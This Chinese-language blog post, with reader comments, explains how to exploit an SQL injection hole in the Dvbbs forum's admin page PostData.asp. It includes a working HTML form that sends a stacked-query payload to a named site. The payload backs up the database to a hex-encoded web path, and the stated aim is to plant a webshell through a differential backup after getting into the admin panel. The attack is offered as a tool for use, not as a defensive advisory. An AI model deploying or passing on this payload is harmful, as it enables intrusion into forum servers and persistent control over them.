动网论坛(SQL版)后台注入方法

作者:肉丝
文章首发至NSP论坛

假如通过某些方式进了动网后台,但是管理员牺牲上传的功能把网站目录权限设置为禁止写入,或者说允许某些目录写入但是没有脚本执行权限,怎么办?大家都知道sql版好歹也可以差异备份,但是呢,注入点在那.前台?呵呵!我想不是大牛一般没人还能找到了吧.既然进了后台,大家就从后台找找看.

Admin/PostData.asp里面有这么一段
sub update()
Dvbbs.Execute("update Dv_setup set Forum_NowUseBBS='"&request.form("TableName")&"'")
Dvbbs.loadSetup()
Dv_suc("更新成功!")
end sub

嘿!漏洞出现了吧.再发一下利用工具

<form id="form" name="form" method="post" action="http://4evil.org/bbs/admin/PostData.asp?action=update
<textarea name="TableName" cols="150" rows="10" id="TableName">dv_bbs1';declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x45003A005C004C006F006E00670053006900740065005C007700770077002E0035003600630063002E0063006E005C006200620073005C00410064006D0069006E005C0064006100740061002E006A0070006700 backup database @a to disk=@s;--</textarea>
<input type="submit" name="Submit" value="提交" />
</form>

保存为htm文件即可.先登陆后台,然后直接用那个浏览器打开整个htm文件,在那写sql语句,我想大家都知道了吧,然后差异备份一下,ok了~~~`

其实可能碰上这种情况的朋友不多,但是,没准还真让你碰上了呢

相关日志

楼被抢了 3 层了... 抢座Rss 2.0或者 Trackback

  • vbstudy

    如果管理员设置了权限备份出来也没用,不过也算个漏洞记下来了

  • 肉丝

    差异备份的权限是挺大的,除非你设置连管理员都没权限写入 :lol:

  • 鬼仔

    作者跑过来了~

发表评论